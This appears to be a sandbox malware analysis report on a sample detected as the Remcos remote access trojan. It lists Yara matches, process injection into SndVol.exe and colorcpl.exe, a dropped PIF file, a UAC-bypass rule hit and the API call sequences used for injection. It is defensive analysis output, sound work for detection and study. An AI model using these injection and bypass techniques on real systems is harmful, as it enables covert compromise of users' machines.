              Source: Yara matchFile source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 7672, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 8136, type: MEMORYSTR

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.SndVol.exe.442191d.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.colorcpl.exe.77d0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.colorcpl.exe.77d191d.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.SndVol.exe.4420000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.SndVol.exe.29130000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.SndVol.exe.4420000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.colorcpl.exe.77d191d.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.SndVol.exe.442191d.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.SndVol.exe.29130000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.colorcpl.exe.77d0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 7672, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 8136, type: MEMORYSTR

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Contains functionalty to change the wallpaper
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_2914CA73 SystemParametersInfoW,8_2_2914CA73
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0041CA73 SystemParametersInfoW,15_2_0041CA73
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_077ED790 SystemParametersInfoW,15_2_077ED790

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 8.2.SndVol.exe.442191d.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 8.2.SndVol.exe.442191d.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 8.2.SndVol.exe.442191d.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 15.2.colorcpl.exe.77d0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 15.2.colorcpl.exe.77d0000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 15.2.colorcpl.exe.77d0000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 15.2.colorcpl.exe.77d191d.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 15.2.colorcpl.exe.77d191d.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 15.2.colorcpl.exe.77d191d.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 8.2.SndVol.exe.4420000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 8.2.SndVol.exe.4420000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 8.2.SndVol.exe.4420000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 8.2.SndVol.exe.29130000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 8.2.SndVol.exe.29130000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 8.2.SndVol.exe.29130000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 8.2.SndVol.exe.4420000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 8.2.SndVol.exe.4420000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 8.2.SndVol.exe.4420000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 15.2.colorcpl.exe.77d191d.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 15.2.colorcpl.exe.77d191d.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 15.2.colorcpl.exe.77d191d.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 8.2.SndVol.exe.442191d.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 8.2.SndVol.exe.442191d.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 8.2.SndVol.exe.442191d.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 8.2.SndVol.exe.29130000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 8.2.SndVol.exe.29130000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 8.2.SndVol.exe.29130000.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 15.2.colorcpl.exe.77d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 15.2.colorcpl.exe.77d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 15.2.colorcpl.exe.77d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: Process Memory Space: SndVol.exe PID: 7672, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: colorcpl.exe PID: 8136, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: C:\Windows\SysWOW64\SndVol.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C6B118 GetModuleHandleW,NtOpenProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW,NtCreateThreadEx,0_2_02C6B118
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C67A2C NtAllocateVirtualMemory,0_2_02C67A2C
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C6DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_02C6DC8C
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C6DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02C6DC04
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C6DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_02C6DD70
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C67D78 NtWriteVirtualMemory,0_2_02C67D78
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C684C8 NtProtectVirtualMemory,0_2_02C684C8
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C67A2A NtAllocateVirtualMemory,0_2_02C67A2A
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C6DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02C6DBB0
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C68D6E GetThreadContext,SetThreadContext,NtResumeThread,0_2_02C68D6E
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C68D70 GetThreadContext,SetThreadContext,NtResumeThread,0_2_02C68D70
              Source: C:\Users\Public\Libraries\Selebzih.PIFCode function: 10_2_02ABB118 GetModuleHandleW,NtOpenProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW,10_2_02ABB118
              Source: C:\Users\Public\Libraries\Selebzih.PIFCode function: 10_2_02AB7D78 NtWriteVirtualMemory,10_2_02AB7D78
              Source: C:\Users\Public\Libraries\Selebzih.PIFCode function: 10_2_02ABDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,10_2_02ABDD70
              Source: C:\Users\Public\Libraries\Selebzih.PIFCode function: 10_2_02ABDBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,10_2_02ABDBB0
              Source: C:\Users\Public\Libraries\Selebzih.PIFCode function: 10_2_02ABDC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,10_2_02ABDC8C
              Source: C:\Users\Public\Libraries\Selebzih.PIFCode function: 10_2_02ABDC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,10_2_02ABDC04
              Source: C:\Users\Public\Libraries\Selebzih.PIFCode function: 10_2_02AB8D6E Toolhelp32ReadProcessMemory,Thread32Next,GetThreadContext,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Toolhelp32ReadProcessMemory,Heap32ListFirst,SetThreadContext,NtResumeThread,Thread32Next,10_2_02AB8D6E
              Source: C:\Users\Public\Libraries\Selebzih.PIFCode function: 10_2_02AB8D70 Toolhelp32ReadProcessMemory,Thread32Next,GetThreadContext,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Toolhelp32ReadProcessMemory,Heap32ListFirst,SetThreadContext,NtResumeThread,Thread32Next,10_2_02AB8D70
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_077EE33D NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,15_2_077EE33D
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C78128 CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,0_2_02C78128
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_291467EF ExitWindowsEx,LoadLibraryA,GetProcAddress,8_2_291467EF
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,15_2_004167EF
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_077E750C ExitWindowsEx,LoadLibraryA,GetProcAddress,15_2_077E750C
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C520C40_2_02C520C4
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_0445950D8_2_0445950D
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_044546F48_2_044546F4
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_0445869B8_2_0445869B
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_0446E7668_2_0446E766
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_044487F48_2_044487F4
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_0445F0688_2_0445F068
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_044740C88_2_044740C8
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_0444814B8_2_0444814B
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_0445F2C58_2_0445F2C5
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_044582838_2_04458283
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_04456C088_2_04456C08
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_0445EC0A8_2_0445EC0A
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_04434D228_2_04434D22
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_04457D878_2_04457D87
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_0445EE398_2_0445EE39
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_04474EF68_2_04474EF6
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_0443FEA88_2_0443FEA8
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_04458F058_2_04458F05
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_04466F8D8_2_04466F8D
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_0444895D8_2_0444895D
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_0443E9108_2_0443E910
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_04458AD08_2_04458AD0
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_04447BBC8_2_04447BBC
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_2916797E8_2_2916797E
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_291639D78_2_291639D7
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_2914DBF38_2_2914DBF3
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_2917DA498_2_2917DA49
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_29157AD78_2_29157AD7
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_29167DB38_2_29167DB3
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_29157C408_2_29157C40
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_29156E9F8_2_29156E9F
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_2916DEED8_2_2916DEED
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_29165EEB8_2_29165EEB
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_2916E11C8_2_2916E11C
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_2914F18B8_2_2914F18B
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_291841D98_2_291841D9
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_291681E88_2_291681E8
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_291440058_2_29144005
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_2916706A8_2_2916706A
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_2916E34B8_2_2916E34B
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_291833AB8_2_291833AB
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_291762708_2_29176270
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_291675668_2_29167566
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_2916E5A88_2_2916E5A8
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_2915742E8_2_2915742E
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_291687F08_2_291687F0
              Source: C:\Users\Public\Libraries\Selebzih.PIFCode function: 10_2_02AA20C410_2_02AA20C4
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0043706A15_2_0043706A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0041400515_2_00414005
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0043E11C15_2_0043E11C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_004541D915_2_004541D9
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_004381E815_2_004381E8
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0041F18B15_2_0041F18B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0044627015_2_00446270
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0043E34B15_2_0043E34B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_004533AB15_2_004533AB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0042742E15_2_0042742E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0043756615_2_00437566
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0043E5A815_2_0043E5A8
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_004387F015_2_004387F0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0043797E15_2_0043797E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_004339D715_2_004339D7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0044DA4915_2_0044DA49
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_00427AD715_2_00427AD7
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0041DBF315_2_0041DBF3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_00427C4015_2_00427C40
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_00437DB315_2_00437DB3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_00435EEB15_2_00435EEB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0043DEED15_2_0043DEED
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_00426E9F15_2_00426E9F
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_077F87F415_2_077F87F4
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0781E76615_2_0781E766
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0780869B15_2_0780869B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_078046F415_2_078046F4
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0780950D15_2_0780950D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0780828315_2_07808283
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0780F2C515_2_0780F2C5
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_077F814B15_2_077F814B
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_078240C815_2_078240C8
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0780F06815_2_0780F068
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_07816F8D15_2_07816F8D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_07808F0515_2_07808F05
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_07824EF615_2_07824EF6
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0780EE3915_2_0780EE39
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_077EFEA815_2_077EFEA8
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_07807D8715_2_07807D87
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_077E4D2215_2_077E4D22
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_07806C0815_2_07806C08
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0780EC0A15_2_0780EC0A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_077F7BBC15_2_077F7BBC
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_07808AD015_2_07808AD0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_077F895D15_2_077F895D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_077EE91015_2_077EE910
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 00402093 appears 50 times
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 0780551E appears 40 times
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 00434801 appears 41 times
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 00401E65 appears 34 times
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 077D2B82 appears 34 times
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 00434E70 appears 54 times
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 07805B8D appears 54 times
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 0445551E appears 40 times
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 29131E65 appears 34 times
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 29164E70 appears 54 times
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 04422B82 appears 34 times
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 29132093 appears 50 times
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 04455B8D appears 54 times
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 29164801 appears 41 times
              Source: C:\Users\Public\Libraries\Selebzih.PIFCode function: String function: 02AA4860 appears 683 times
              Source: C:\Users\Public\Libraries\Selebzih.PIFCode function: String function: 02AB894C appears 50 times
              Source: C:\Users\Public\Libraries\Selebzih.PIFCode function: String function: 02AA46D4 appears 155 times
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: String function: 02C689D0 appears 45 times
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: String function: 02C6894C appears 56 times
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: String function: 02C544DC appears 74 times
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: String function: 02C54500 appears 33 times
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: String function: 02C54860 appears 949 times
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: String function: 02C546D4 appears 244 times
              Source: jlPBMMQbXC.exeBinary or memory string: OriginalFilename vs jlPBMMQbXC.exe
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs jlPBMMQbXC.exe
              Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs jlPBMMQbXC.exe
              Source: jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9F7000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs jlPBMMQbXC.exe
              Source: jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs jlPBMMQbXC.exe
              Source: jlPBMMQbXC.exe, 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs jlPBMMQbXC.exe
              Source: jlPBMMQbXC.exe, 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs jlPBMMQbXC.exe
              Source: jlPBMMQbXC.exe, 00000000.00000002.1630792872.000000007F388000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameReadIcon.exe\ vs jlPBMMQbXC.exe
              Source: jlPBMMQbXC.exe, 00000000.00000003.1555406818.000000000E444000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs jlPBMMQbXC.exe
              Source: jlPBMMQbXC.exe, 00000000.00000003.1386950607.000000007FCDF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs jlPBMMQbXC.exe
              Source: jlPBMMQbXC.exe, 00000000.00000002.1638986421.000000007FB20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs jlPBMMQbXC.exe
              Source: jlPBMMQbXC.exe, 00000000.00000003.1555406818.000000000E473000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs jlPBMMQbXC.exe
              Source: jlPBMMQbXC.exe, 00000000.00000002.1577348813.0000000002435000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs jlPBMMQbXC.exe
              Source: jlPBMMQbXC.exe, 00000000.00000000.1382432413.0000000000487000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameReadIcon.exe\ vs jlPBMMQbXC.exe
              Source: jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs jlPBMMQbXC.exe
